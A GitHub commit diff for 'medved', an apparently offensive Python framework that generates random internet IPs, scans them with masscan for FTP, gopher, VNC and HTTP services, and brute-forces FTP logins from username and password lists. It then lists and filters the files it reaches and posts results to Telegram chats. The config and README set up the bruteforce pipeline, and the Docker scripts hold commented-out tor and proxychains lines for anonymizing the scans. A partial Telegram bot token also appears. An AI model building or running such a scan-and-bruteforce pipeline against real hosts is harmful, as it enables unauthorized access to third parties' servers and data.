This Is How We Do It

La ra ra ra ra ra
This is how we do it
This commit is contained in:
Alexander 2018-10-10 21:26:13 +03:00 committed by GitHub
commit 10d514e45b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
51 changed files with 873 additions and 806 deletions

6
.pylintrc Normal file
View File

@ -0,0 +1,6 @@
[MASTER]
extension-pkg-whitelist=GeoIP
[FORMAT]
indent-string=' '
indent-after-paren=2

View File

@ -3,6 +3,13 @@
import yaml import yaml
cnf = {} class Config(object):
with open('data/config.yaml') as config_file: def __init__(self):
cnf = yaml.load(config_file) with open('data/config.yaml') as config_file:
self.config = yaml.load(config_file)
def get(self, key, defval=None):
return self.config.get(key, defval)
cnf = Config()

180
README.md
View File

@ -2,130 +2,143 @@
alpha beta whatever alpha beta whatever
partly works partly works
## roadmap
refactor README and lib/plugin/plugins/*
cleanup *
probably Listener shoul be part of Core in order to supervise everything
tasks don't store results currently. need to implement some validation of performed tasks (at least in Executor thread before spreading new tasks)
http://python-rq.org/docs/results/
## configuration ## configuration
`data/config.yaml` `data/config.yaml`
``` ```
# lists top-level services (like listeners, executors, data-manager) and pipelines enabled ---
dsl_version: 1
core: core:
services: # should point to correct service services:
- data_manager - random_ip
- rq_executor - rq_executor
- tg_feed
pipelines: pipelines:
- ftp - ftp
- gopher
# describes top-level services and their configurations
services: services:
data_manager:
# REQUIRED package name, just like path to file with dots
package: lib.data.Manager
# REQUIRED class inherited from Service (lib.Service)
service: DataManager
# REQUIRED used to select one of storages
data:
id: pool
# there can be more service-specific configuration fields
# for now they can be found in code :)
sources:
- random_ip
feeds:
- test_telegram
rq_executor:
package: lib.exeq.Executor
service: RQExecutor
data:
id: pool
redis:
host: "127.0.0.1"
# describes datasources for data_manager
sources:
random_ip: random_ip:
package: lib.plugin.base.lib.IP package: lib.plugin.base.lib.IP
service: RandomIP service: RandomIP
data: storage: ip_source
id: random_ip rq_executor:
package: lib.exec.Executor
# describes datafeeds for data_manager service: RQExecutor
feeds: storage: pool
test_telegram: # doesn't work yet, eh redis:
host: "127.0.0.1"
tg_feed:
package: lib.plugin.base.lib.Telegram package: lib.plugin.base.lib.Telegram
service: TelegramFeed service: TelegramFeed
data: storage: pool
id: pool token: "mocken"
token:
chats: chats:
- id: good_evening - id: aiWeipeighah7vufoHa0ieToipooYe
pipelines: [ftp, gopher] if:
filter: steps.ftp_apply_tpl: true
clause: any-of data.filter: false
equal: - id: ohl7AeGah5uo8cho4nae9Eemaeyae3
- ftp_list_files_status: success if:
- gopher_collect_status: success steps.gopher_apply_tpl: true
data.filter: false
# describes various storages, e.g. data pool for pipelines or queues for datasources
storage: storage:
pool: pool:
# REQUIRED
package: lib.plugin.base.lib.Mongo package: lib.plugin.base.lib.Mongo
service: MongoStorage service: MongoStorage
size: 40960 size: 0
# service-specific
db: "medved" db: "medved"
coll: 'pool' coll: 'pool'
random_ip: ip_source:
package: lib.plugin.base.lib.Mongo package: lib.plugin.base.lib.Mongo
service: MongoStorage service: MongoStorage
size: 500 size: 800
db: "medved" db: "medved"
coll: 'randomipsource' coll: 'ip_source'
# describes available pipelines
pipelines: pipelines:
ftp: ftp:
# list of steps with dependencies source: ip_source
steps: steps:
# will pass 10 items to lib.plugin.iscan.tasks.common.scan - task: ftp_scan
- name: scan priority: low
package: lib.plugin.iscan.tasks.common parallel: 100
service: scan - task: ftp_connect
multiple: 10 # default: False priority: normal
requires: [] if:
# will pass 1 item marked with ftp_scan to lib.plugin.iscan.tasks.ftp.connect steps.ftp_scan: true
- name: connect - task: ftp_list_files
package: lib.plugin.iscan.tasks.ftp priority: high
service: connect if:
requires: steps.ftp_connect: true
- ftp_scan - task: ftp_apply_tpl
- name: list_files priority: high
package: lib.plugin.iscan.tasks.ftp if:
service: list_files steps.ftp_list_files: true
requires: gopher:
- ftp_connect source: ip_source
steps:
- task: gopher_scan
priority: normal
parallel: 100
- task: gopher_find
priority: high
if:
steps.gopher_scan: true
- task: gopher_apply_tpl
priority: high
if:
steps.gopher_find: true
http:
source: ip_source
steps:
- task: http_scan
priority: low
parallel: 25
# various configurations for tasks
tasks: tasks:
gopher_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports:
- 70
gopher_find:
package: lib.plugin.iscan.tasks.gopher
service: GopherFindTask
gopher_apply_tpl:
package: lib.plugin.base.tasks.text
service: Jinja2TemplateTask
path: lib/plugin/iscan/templates/gopher.tpl
ftp_scan: ftp_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports: ports:
- 21 - 21
ftp_connect: ftp_connect:
package: lib.plugin.iscan.tasks.ftp
service: FTPConnectTask
logins: data/ftp/logins.txt logins: data/ftp/logins.txt
passwords: data/ftp/passwords.txt passwords: data/ftp/passwords.txt
bruteforce: true bruteforce: true
timeout: 15 timeout: 15
ftp_list_files: ftp_list_files:
package: lib.plugin.iscan.tasks.ftp
service: FTPListFilesTask
filter: true
ftp_apply_tpl:
package: lib.plugin.base.tasks.text
service: Jinja2TemplateTask
path: lib/plugin/iscan/templates/ftp.tpl
logging: logging:
Storage: INFO Storage: DEBUG
Loader: DEBUG
``` ```
probably it can be launched with docker, however I didn't test it yet probably it can be launched with docker, however I didn't test it yet
@ -137,9 +150,10 @@ you'll need working redis and mongodb for default configuration
## top-level services ## top-level services
### lib.data.Manager.DataManager ### sources ###
Orchestrates datasources and datafeeds - starts and stops them, also checks pool size. If it is too low - takes data from DS. ### feeds ###
### lib.exeq.Executor.RQExecutor
### lib.exec.Executor.RQExecutor
Should run pipelines described in configuration. Works via [RedisQueue](http://python-rq.org/), so needs some Redis up and running Should run pipelines described in configuration. Works via [RedisQueue](http://python-rq.org/), so needs some Redis up and running
Basically takes data from pool and submits it to workers. Basically takes data from pool and submits it to workers.
RQ workers should be launched separately (`rqworker worker` from code root) RQ workers should be launched separately (`rqworker worker` from code root)

View File

@ -3,110 +3,175 @@ dsl_version: 1
core: core:
services: services:
- data_manager - random_ip
# - zmq_listener
- rq_executor - rq_executor
- GC
- tg_feed
pipelines: pipelines:
- ftp - ftp
- gopher
services: services:
data_manager:
package: lib.data.Manager
service: DataManager
data:
id: pool
sources:
- random_ip
feeds:
- test_telegram
zmq_listener:
package: lib.net.Listener
service: ZMQListener
data:
id: pool
listen: "0.0.0.0"
port: 12321
rq_executor:
package: lib.exeq.Executor
service: RQExecutor
data:
id: pool
redis:
host: "127.0.0.1"
sources:
random_ip: random_ip:
package: lib.plugin.base.lib.IP package: lib.plugin.base.lib.IP
service: RandomIP service: RandomIP
data: storage: ip_source
id: random_ip rq_executor:
package: lib.exec.Executor
service: RQExecutor
feeds: storage: pool
test_telegram: delay: 2
redis:
host: redis
GC:
package: lib.plugin.base.lib.GC
service: GarbageCollector
storage: pool
delay: 10
if:
steps.ftp_scan: false
steps.gopher_scan: false
tg_feed:
package: lib.plugin.base.lib.Telegram package: lib.plugin.base.lib.Telegram
service: TelegramFeed service: TelegramFeed
data: storage: pool
id: pool token: "358947254:"
token:
chats: chats:
- id: good_evening - id: aiWeipeighah7vufoHa0ieToipooYe
pipelines: [ftp, gopher] if:
filter: steps.ftp_apply_tpl: true
clause: any-of - id: ohl7AeGah5uo8cho4nae9Eemaeyae3
equal: if:
- ftp_list_files_status: success steps.gopher_apply_tpl: true
- gopher_collect_status: success data.filter: false
storage: storage:
pool: pool:
package: lib.plugin.base.lib.Mongo package: lib.plugin.base.lib.Mongo
service: MongoStorage service: MongoStorage
size: 40960 url: mongo
size: 0
db: "medved" db: "medved"
coll: 'pool' coll: 'pool'
random_ip: ip_source:
package: lib.plugin.base.lib.Mongo package: lib.plugin.base.lib.Mongo
service: MongoStorage service: MongoStorage
size: 500 url: mongo
size: 800
db: "medved" db: "medved"
coll: 'randomipsource' coll: 'ip_source'
pipelines: pipelines:
ftp: ftp:
source: ip_source
steps: steps:
- name: scan - task: ftp_scan
package: lib.plugin.iscan.tasks.common priority: low
service: scan parallel: 100
multiple: 10 - task: ftp_connect
requires: [] priority: normal
- name: connect if:
package: lib.plugin.iscan.tasks.ftp steps.ftp_scan: true
service: connect - task: ftp_list_files
multiple: False priority: normal
requires: if:
- ftp_scan steps.ftp_connect: true
- name: list_files - task: ftp_filter_files
package: lib.plugin.iscan.tasks.ftp priority: normal
service: list_files parallel: 100
multiple: False if:
requires: steps.ftp_list_files: true
- ftp_connect - task: ftp_apply_tpl
priority: high
if:
steps.ftp_filter_files: true
data.filter: false
gopher:
source: ip_source
steps:
- task: gopher_scan
priority: normal
parallel: 100
- task: gopher_find
priority: high
if:
steps.gopher_scan: true
- task: gopher_apply_tpl
priority: high
if:
steps.gopher_find: true
http:
source: ip_source
steps:
- task: http_scan
priority: low
parallel: 25
tasks: tasks:
gopher_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports:
- 70
gopher_find:
package: lib.plugin.iscan.tasks.gopher
service: GopherFindTask
gopher_apply_tpl:
package: lib.plugin.base.tasks.text
service: Jinja2TemplateTask
path: lib/plugin/iscan/templates/gopher.tpl
vnc_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports:
- 5900
- 5901
vnc_connect:
package: lib.plugin.iscan.tasks.vnc
service: VNCConnectTask
ports:
- 5900
- 5901
http_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports: &http_ports
- 80
- 81
- 8080
- 8081
http_find:
package: lib.plugin.iscan.tasks.http
service: HTTPFindTask
ftp_scan: ftp_scan:
package: lib.plugin.iscan.tasks.common
service: MasScanTask
ports: ports:
- 21 - 21
ftp_connect: ftp_connect:
logins: data/ftp/logins.txt package: lib.plugin.iscan.tasks.ftp
service: FTPConnectTask
usernames: data/ftp/usernames.txt
passwords: data/ftp/passwords.txt passwords: data/ftp/passwords.txt
bruteforce: true bruteforce: true
timeout: 15 timeout: 15
ftp_list_files: ftp_list_files:
package: lib.plugin.iscan.tasks.ftp
service: FTPListFilesTask
ftp_filter_files:
package: lib.plugin.iscan.tasks.ftp
service: FTPFilterFilesTask
ftp_apply_tpl:
package: lib.plugin.base.tasks.text
service: Jinja2TemplateTask
path: lib/plugin/iscan/templates/ftp.tpl
logging: logging:
Storage: INFO Storage: DEBUG
Loader: INFO

View File

@ -51,6 +51,8 @@ services:
mongo: mongo:
image: mongo:latest image: mongo:latest
command:
- '--quiet'
volumes: volumes:
- ./docker/lib/mongo:/data/ - ./docker/lib/mongo:/data/
env_file: env_file:

View File

@ -7,6 +7,7 @@ export REDIS_IP=$(host ${REDIS_IP} | head -n1 | grep -Po "(\d+\.?){4}")
/tmp/confd -onetime -backend env /tmp/confd -onetime -backend env
sudo -u tor tor #sudo -u tor tor
cd /mdvd && proxychains -q python3 medved.py #cd /mdvd && proxychains -q python3 medved.py
cd /mdvd && python3 medved.py

View File

@ -1,5 +1,16 @@
FROM medved_base:latest FROM medved_base:latest
RUN pacman -S --noconfirm --needed git libpcap linux-headers clang tor
RUN git clone https://github.com/robertdavidgraham/masscan && \
cd masscan && \
make -j && \
mv bin/masscan /usr/bin/masscan
RUN wget -N http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz && gunzip GeoLiteCity.dat.gz
RUN mkdir -p /usr/share/GeoIP/ && mv GeoLiteCity.dat /usr/share/GeoIP/GeoIPCity.dat
ADD files/run.sh /tmp/run.sh ADD files/run.sh /tmp/run.sh
CMD ["/tmp/run.sh"] CMD ["/tmp/run.sh"]

View File

@ -4,4 +4,4 @@ export CORE_IP=$(host ${CORE_IP} | head -n1 | grep -Po "(\d+\.?){4}")
/tmp/confd -onetime -backend env /tmp/confd -onetime -backend env
cd /mdvd && proxychains -q rq worker common -u "redis://${REDIS_IP}:6379/" cd /mdvd && rq worker high normal low -u "redis://${REDIS_IP}:6379/"

View File

@ -1,3 +1,8 @@
"""
Provides Service class
"""
from time import sleep from time import sleep
from threading import Thread from threading import Thread
from lib import Logger, Loader, Loadable from lib import Logger, Loader, Loadable
@ -9,7 +14,7 @@ class Service(Loadable):
def __init__(self, thread, id, root=cnf): def __init__(self, thread, id, root=cnf):
super().__init__(id, root) super().__init__(id, root)
self._data = Loader.by_id('storage', self.lcnf.get("data").get("id")) self._data = Loader.by_id('storage', self.lcnf.get("storage"))
self._stop_timeout = 10 self._stop_timeout = 10
self._running = False self._running = False
@ -23,6 +28,7 @@ class Service(Loadable):
pass pass
def start(self): def start(self):
"""Executes pre_start, starts thread and executes post_start"""
self._logger.debug('pre_start') self._logger.debug('pre_start')
self._pre_start() self._pre_start()
@ -38,6 +44,7 @@ class Service(Loadable):
self._logger.info('start finished') self._logger.info('start finished')
def stop(self): def stop(self):
"""Executes pre_stop, stops thread and executes post_stop"""
self._logger.debug('pre_stop') self._logger.debug('pre_stop')
self._pre_stop() self._pre_stop()

View File

@ -1,20 +1,8 @@
from queue import LifoQueue
from time import sleep
import itertools
from lib.net import Remote
from lib import Service from lib import Service
class Feed(Service): class Feed(Service):
"""Base class for datafeeds""" """Base class for datafeeds"""
def __init__(self, thread, id, root): def __init__(self, thread, id, root):
super().__init__(thread, id, root) super().__init__(thread, id, root)
self._logger.add_field('service', 'Feed') self._logger.add_field('service', 'Feed')
self._logger.add_field('vname', self.__class__.__name__) self._logger.add_field('vname', self.__class__.__name__)
def get(self, plugin, count=1, timeout=3):
items = self._data.get(count)
self._logger.debug("get %s OF %s", len(items), count)
return items

17
lib/data/Item.py Normal file
View File

@ -0,0 +1,17 @@
class Item(object):
"""Base class for item"""
def __init__(self, source):
self._item = {
'source': source,
'steps': {},
'data': {}
}
def set(self, key, value):
elem = self._item['data']
upd = {}
for x in key.split("."):
elem = elem.get(x, {})
upd[x] = {}
upd[0] = value
self._item['data'].update(upd)

View File

@ -1,61 +0,0 @@
from lib.data import Source, Feed
from time import sleep
from lib import Service, Loader
class DataManager(Service):
"""Actually, we may load feeds, sources and datapools right in core. Not sure that datamanager is required just to pull sources"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
self._logger.add_field('service', 'DataManager')
self.sources = {}
for s in self.lcnf.get("sources"):
self.attach_source(s)
self.feeds = {}
for f in self.lcnf.get("feeds"):
self.attach_feed(f)
def _pre_start(self):
self._logger.debug('starting sources')
for _,s in self.sources.items():
s.start()
self._logger.debug('starting feeds')
for _,f in self.feeds.items():
f.start()
def _pre_stop(self):
self._logger.debug('stopping sources')
for _,s in self.sources.items():
s.stop()
self._logger.debug('stopping feeds')
for _,f in self.feeds.items():
f.stop()
def attach_source(self, id):
ds = Loader.by_id('sources', id)
self.sources[id] = ds
def attach_feed(self, id):
df = Loader.by_id('feeds', id)
self.feeds[id] = df
def get_source(self, name) -> Source:
return self.sources.get(name)
def get_feed(self, name) -> Feed:
return self.feeds.get(name)
def __run(self):
oneshot = self.lcnf.get("oneshot", 500)
while self._running:
if self._data.count() < oneshot:
while self._running and (self._data.count() + oneshot < self._data.size()):
self._logger.debug("fill %s OF %s", self._data.count(), self._data.size())
for _,source in self.sources.items():
items = source.next(count=oneshot)
if items:
self._data.put(items)
sleep(1)
else:
self._logger.debug('Pool size is ok: %s', self._data.count())
sleep(1)

View File

@ -1,21 +1,22 @@
import copy
from lib import Service from lib import Service
class Source(Service): class Source(Service):
"""Base class for datasources""" """Base class for datasources"""
def __init__(self, thread, id, root): def __init__(self, thread, id, root):
super().__init__(thread, id, root) super().__init__(thread, id, root)
self._logger.add_field('service', 'Feed') self._logger.add_field('service', 'Source')
self._logger.add_field('vname', self.__class__.__name__) self._logger.add_field('vname', self.__class__.__name__)
def item(self, val = None): self._item = {
return {
'source': self._id, 'source': self._id,
'steps': {}, 'steps': {},
'data': val 'data': {}
} }
def next(self, count=10, block=False): def _create(self):
if self._running or not self._data.count() == 0: return copy.deepcopy(self._item)
return self._data.get(count=count, block=block)
elif self._data.count() == 0: def _prepare(self, item):
raise Exception("Storage is empty, generator is stopped") pass

View File

@ -1,4 +1,4 @@
from queue import LifoQueue, Empty, Full import inspect
from lib import Loadable, Logger from lib import Loadable, Logger
@ -7,7 +7,7 @@ class Storage(Loadable):
def __init__(self, id, root): def __init__(self, id, root):
super().__init__(id, root) super().__init__(id, root)
self._size = self.lcnf.get("size") self._size = self.lcnf.get("size", 0)
self._logger = Logger("Storage") self._logger = Logger("Storage")
self._logger.add_field('vname', self.__class__.__name__) self._logger.add_field('vname', self.__class__.__name__)
@ -27,7 +27,9 @@ class Storage(Loadable):
return items return items
def get(self, count=1, block=True, filter=None): def get(self, count=1, block=True, filter=None):
self._logger.debug("get %s, %s", count, block) """Returns items, removing them from storage"""
self._logger.debug("get|%s|%s|%s",
count, block, inspect.stack()[1][0].f_locals["self"].__class__.__name__)
items = [] items = []
if count == 1: if count == 1:
items.append(self._get(block, filter)) items.append(self._get(block, filter))
@ -44,40 +46,37 @@ class Storage(Loadable):
self._put(i, block) self._put(i, block)
def put(self, items, block=True): def put(self, items, block=True):
"""Puts provided items"""
self._logger.debug("put|%s|%s|%s",
len(items), block, inspect.stack()[1][0].f_locals["self"].__class__.__name__)
if items: if items:
items = [i for i in items if i is not None] items = [i for i in items if i is not None]
self._logger.debug("put %s, %s", len(items), block)
if len(items) == 1: if len(items) == 1:
self._put(items[0], block) self._put(items[0], block)
elif len(items) > 1: elif len(items) > 1:
self._put_many(items, block) self._put_many(items, block)
def _find(self): def _find(self, filter):
pass pass
def find(self): def find(self, filter):
self._logger.debug("find") """Returns items without removing them from storage"""
return self._find() return self._find(filter)
def _update(self, items, update):
class LiFoStorage(Storage):
def __init__(self, id, root):
super().__init__(id, root)
self._data = LifoQueue()
def count(self):
return self._data.qsize()
def _get(self, block=False, filter=None):
try:
return self._data.get(block=block)
except Empty:
pass pass
def _put(self, item, block=True): def update(self, items, update=None):
try: """Updates provided items"""
self._data.put(item, block=block) self._logger.debug("update|%s|%s",
except Full: len(items), inspect.stack()[1][0].f_locals["self"].__class__.__name__)
if items:
items = [i for i in items if i is not None]
self._update(items, update)
def _remove(self, items):
pass pass
def remove(self, items):
"""Removes provided items"""
self._remove(items)

View File

@ -1,13 +0,0 @@
from lib import Loadable, Logger
# dunno
class Type(Loadable):
def __init__(self):
self.data = {}
class Host(Type):
def __init__(self):
self.data = {
'ip': ''
}

View File

@ -1,7 +1,6 @@
from .Storage import Storage from .Storage import Storage
from .Source import Source from .Source import Source
from .Feed import Feed from .Feed import Feed
from .Item import Item
from .Manager import DataManager __all__ = ['Storage', 'Source', 'Feed', 'Item']
__all__ = ['Storage', 'Source', 'DataManager']

71
lib/exec/Executor.py Normal file
View File

@ -0,0 +1,71 @@
from lib import Service, Loader, Loadable
from time import sleep
from rq import Queue
from redis import Redis
class Executor(Service):
"""Base class for executors"""
def __init__(self, thread, id, root):
super().__init__(thread, id, root)
self._logger.add_field('service', 'Executor')
self._logger.add_field('vname', self.__class__.__name__)
class RQExecutor(Executor):
"""rq (redis queue) executor"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
def __run(self):
redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
jobs = []
known_sources = {}
while self._running:
sleep(self.lcnf.get('delay', 0.5))
try:
for pn, pipeline in self.cnf.get("pipelines").items():
if pn not in self.cnf.get('core').get('pipelines'):
continue
for step in pipeline['steps']:
q = Queue(step.get('priority', 'normal'), connection=redis_conn)
for job_id in jobs:
job = q.fetch_job(job_id)
if job:
if job.result is not None:
self._logger.debug("%s|%s", job_id, job._status)
self._data.update(job.result)
job.cleanup()
jobs.remove(job_id)
if len(jobs) + 1 > self.lcnf.get('qsize', 200):
continue
filter = {"steps.%s" % step['task']: {'$exists': False}}
filter.update({key: value for key, value in step.get("if", {}).items()})
count = step.get('parallel', 1)
# get as much as possible from own pool
items = self._data.get(block=False, count=count, filter=filter)
# obtain everything else from source
if len(items) < count:
source = None
source_id = pipeline.get('source')
if source_id in known_sources:
source = known_sources[source_id]
else:
source = Loader.by_id('storage', source_id)
known_sources[source_id] = source
new_items = source.get(block=False, count=(count - len(items)), filter=filter)
items.extend(new_items)
source.remove(new_items)
if items:
for i in items:
i['steps'][step['task']] = None
self._data.update(items)
job = q.enqueue("lib.exec.Task.run", step['task'], items)
self._logger.info("%s|%s|%s|%s", job.id, step.get('priority', 'normal'), step['task'], len(items))
jobs.append(job.id)
except Exception as e:
self._logger.error("Error in executor main thread: %s", e)

28
lib/exec/Task.py Normal file
View File

@ -0,0 +1,28 @@
from lib import Loadable, Logger, Loader
from Config import cnf
class Task(Loadable):
def __init__(self, id, root):
super().__init__(id, root)
self._logger = Logger(self.__class__.__name__)
def run(self, items):
result = self._run(items)
return result
def _run(self, items):
for item in items:
try:
item['steps'][self._id] = self._process(item)
except Exception as e:
self._logger.debug("Error occured while executing: %s", e)
item['steps'][self._id] = False
return items
def _process(self, item):
return True
def run(task_name, items):
result = Loader.by_id('tasks', task_name).run(items)
return result

View File

@ -1 +1,2 @@
from .Executor import Executor from .Executor import Executor
from .Task import Task

View File

@ -1,54 +0,0 @@
from lib import Service, Loader, Loadable
from lib.tasks.worker import worker
from time import sleep
from rq import Queue
from redis import Redis
class Executor(Service):
"""Base class for executors"""
def __init__(self, thread, id, root):
super().__init__(thread, id, root)
self._logger.add_field('service', 'Executor')
self._logger.add_field('vname', self.__class__.__name__)
class RQExecutor(Executor):
"""rq (redis queue) executor - lightweight; workers placed on different nodes"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
def __run(self):
while self._running:
try:
redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
q = Queue('worker', connection=redis_conn)
if q.count + 1 > self.lcnf.get('size', 100):
sleep(self.lcnf.get('delay', 2))
continue
for pn, pipeline in self.cnf.get("pipelines").items():
self._logger.debug("pipeline: %s", pn)
for step in pipeline['steps']:
self._logger.debug("step: %s", step['name'])
filter = {
"not_exist": [
pn + '_' + step['name']
],
"exist": [
[tag for tag in step.get("requires")]
]
}
items = []
multiple = step.get('multiple', False)
if multiple != False:
items = self._data.get(block=False, count=multiple, filter=filter)
else:
items = self._data.get(block=False, filter=filter)
if items:
self._logger.debug("enqueueing %s.%s with %s", step['package'], step['service'], items)
q.enqueue("%s.%s" % (step['package'], step['service']), items)
except Exception as e:
self._logger.error(e)

View File

@ -1,7 +0,0 @@
from lib import Loadable
#TODO dunno
class Pipeline(Loadable):
def __init__(self, id, root):
super().__init__(id, root)

View File

@ -1,9 +0,0 @@
import importlib
class Manager:
def __init__(self):
pass
@staticmethod
def get_plugin(name):
return importlib.import_module("lib.plugin.plugins." + name)

View File

@ -1,6 +0,0 @@
THIS PART IS LIKE UNDER CONSTRUCTION
get out
for now
come back later

View File

@ -1,7 +0,0 @@
class Task:
"""Pipelines should consist of tasks??..."""
def __init__(self):
self._data = None
def run(self):
pass

View File

@ -1 +0,0 @@
from .Manager import Manager

25
lib/plugin/base/lib/GC.py Normal file
View File

@ -0,0 +1,25 @@
"""
Provides garbage collector
"""
from time import sleep
from lib import Service
class GarbageCollector(Service):
"""Simple GarbageCollector, removes items by filter periodically"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
self._logger.add_field('service', 'GC')
self._logger.add_field('vname', self.__class__.__name__)
def __run(self):
while self._running:
filter = {key: value for key, value in self.lcnf.get("if", {}).items()}
if filter:
items = self._data.find(filter=filter)
self._logger.info("Removing %s items", items.count())
self._data.remove(items)
else:
self._logger.error("Filter is empty!")
sleep(self.lcnf.get('delay', 600))

View File

@ -1,35 +1,51 @@
from lib.data import Source
from lib import Loader
from time import sleep from time import sleep
import os
import netaddr
import itertools import itertools
import random import random
import socket import socket
import struct import struct
import netaddr
import GeoIP
from lib.data import Source
class IPSource(Source): class IPSource(Source):
"""Base source for IPs, appends data.ip and data.geo"""
def __init__(self, thread, id, root): def __init__(self, thread, id, root):
super().__init__(thread, id, root) super().__init__(thread, id, root)
self._item.update({
def item(self, val = None):
return {
'source': self._id,
'data': { 'data': {
'ip': val 'ip': None,
'geo': {
'country': None,
'city': None
} }
} }
})
self.geo_ip = GeoIP.open(self.lcnf.get("geoip_dat", "/usr/share/GeoIP/GeoIPCity.dat"),
GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)
def _geoip(self, item):
geodata = self.geo_ip.record_by_name(item['data']['ip'])
if geodata:
if 'country_code3' in geodata and geodata['country_code3']:
item['data']['geo']['country'] = geodata['country_code3']
if 'city' in geodata and geodata['city']:
item['data']['geo']['city'] = geodata['city']
def _prepare(self, item):
self._geoip(item)
class IPRange(IPSource): class IPRange(IPSource):
"""Provides IPs from ranges specified in file"""
def __init__(self, id, root): def __init__(self, id, root):
super().__init__(self.__run, id, root) super().__init__(self.__run, id, root)
self._iprange = [] self._iprange = []
self.load_ip_range() self.load_ip_range()
def load_ip_range(self): def load_ip_range(self):
"""Loads IP ranges from specified path"""
ip_range = [] ip_range = []
with open(self.lcnf.get('path'), "r") as text: with open(self.lcnf.get('path'), "r") as text:
for line in text: for line in text:
@ -40,18 +56,19 @@ class IPRange(IPSource):
else: else:
ip_range.append(netaddr.IPNetwork(diap[0])) ip_range.append(netaddr.IPNetwork(diap[0]))
except Exception as e: except Exception as e:
raise Exception("Error while adding range {}: {}".format(line, e)) raise Exception("Error while adding range %s: %s" % (line, e))
self._iprange = ip_range self._iprange = ip_range
def __run(self): def __run(self):
npos = 0 npos = 0 # network cursor
apos = 0 apos = 0 # address cursor
while self._running: while self._running:
try: try:
for _ in itertools.repeat(None, self.lcnf.get('oneshot', 100)): for _ in itertools.repeat(None, self.lcnf.get('oneshot', 200)):
item = self._create()
if self.lcnf.get('ordered', True): if self.lcnf.get('ordered', True):
# put currently selected element # put currently selected element
self._data.put(str(self._iprange[npos][apos])) item['data']['ip'] = str(self._iprange[npos][apos])
# rotate next element through networks and addresses # rotate next element through networks and addresses
if apos + 1 < self._iprange[npos].size: if apos + 1 < self._iprange[npos].size:
apos += 1 apos += 1
@ -65,13 +82,16 @@ class IPRange(IPSource):
else: else:
self.stop() self.stop()
else: else:
self._data.put(str(random.choice(random.choice(self._iprange)))) item['data']['ip'] = str(random.choice(random.choice(self._iprange)))
self._prepare(item)
self._data.put(item)
sleep(self.lcnf.get('delay', 0.5)) sleep(self.lcnf.get('delay', 0.5))
except Exception as e: except Exception as err:
self._logger.warn(e) self._logger.warn(err)
class RandomIP(IPSource): class RandomIP(IPSource):
"""Generates completely pseudorandom IPs"""
def __init__(self, id, root): def __init__(self, id, root):
super().__init__(self.__run, id, root) super().__init__(self.__run, id, root)
@ -79,10 +99,13 @@ class RandomIP(IPSource):
while self._running: while self._running:
try: try:
items = [] items = []
for _ in itertools.repeat(None, self.lcnf.get("oneshot", 100)): for _ in itertools.repeat(None, self.lcnf.get("oneshot", 200)):
item = self._create()
randomip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) randomip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
items.append(self.item(str(randomip))) item['data']['ip'] = str(randomip)
self._prepare(item)
items.append(item)
self._data.put(items) self._data.put(items)
sleep(self.lcnf.get("delay", 0.5)) sleep(self.lcnf.get("delay", 0.2))
except Exception as e: except Exception as err:
self._logger.warn(e) self._logger.warn(err)

View File

@ -1,5 +1,6 @@
from pymongo import MongoClient
from time import sleep from time import sleep
from pymongo import MongoClient
from lib.data import Storage from lib.data import Storage
class MongoStorage(Storage): class MongoStorage(Storage):
@ -17,41 +18,31 @@ class MongoStorage(Storage):
return self._coll.count() return self._coll.count()
def _get(self, block, filter): def _get(self, block, filter):
# TODO cleanup dat BS
if filter is None: if filter is None:
filter = {} filter = {}
ne_tags = {}
e_tags = {} item = self._coll.find_one(filter=filter)
if filter.get('not_exist'):
tags = []
for ne in filter.get('not_exist'):
tags.append(ne)
ne_tags = {'tags': {'$not': {'$all': tags}}}
del filter['not_exist']
if filter.get('exist'):
tags = []
for e in filter.get('exist'):
tags.append(e)
e_tags = {'tags': {'$all': tags}}
del filter['exist']
filter = {'$and': [ne_tags, e_tags]}
item = self._coll.find_one_and_delete(filter=filter)
if block: if block:
while not item: while not item:
item = self._coll.find_one_and_delete(filter=filter) item = self._coll.find_one(filter=filter)
sleep(1) sleep(1)
return item return item
def _get_many(self, count, block, filter):
if filter is None:
filter = {}
items = self._coll.find(filter=filter, limit=count)
return items
def _put(self, item, block): def _put(self, item, block):
if block: if block and self.size() is not 0:
while self.count() + 1 > self.size(): while self.count() + 1 > self.size():
self._logger.debug('Collection full: %s of %s', self.count(), self.size()) self._logger.debug('Collection full: %s of %s', self.count(), self.size())
sleep(1) sleep(1)
self._coll.insert_one(item) self._coll.insert_one(item)
def _put_many(self, items, block): def _put_many(self, items, block):
if block: if block and self.size() is not 0:
while self.count() + len(items) > self.size(): while self.count() + len(items) > self.size():
self._logger.debug('Collection full: %s of %s', self.count(), self.size()) self._logger.debug('Collection full: %s of %s', self.count(), self.size())
sleep(1) sleep(1)
@ -61,3 +52,14 @@ class MongoStorage(Storage):
if filter is None: if filter is None:
filter = {} filter = {}
return self._coll.find(filter) return self._coll.find(filter)
def _update(self, items, update):
if update:
filter = {'_id': {'$in': [item['_id'] for item in items]}}
self._coll.update_many(filter, update, upsert=True)
else:
for item in items:
self._coll.replace_one({'_id': item['_id']}, item, upsert=True)
def _remove(self, items):
self._coll.delete_many({'_id': {'$in': [item['_id'] for item in items]}})

View File

@ -1,9 +1,7 @@
from lib.data import Feed, Filter
from lib.plugin import Manager
import telebot
from time import sleep from time import sleep
import telebot
from lib.data import Feed
class TelegramFeed(Feed): class TelegramFeed(Feed):
"""Send data to Telegram chat""" """Send data to Telegram chat"""
@ -16,24 +14,18 @@ class TelegramFeed(Feed):
while self._running: while self._running:
try: try:
for chat in self.lcnf.get("chats"): for chat in self.lcnf.get("chats"):
chat_id = chat['id'] chat_id = chat.get('id')
sleep(delay) self._logger.debug(chat_id)
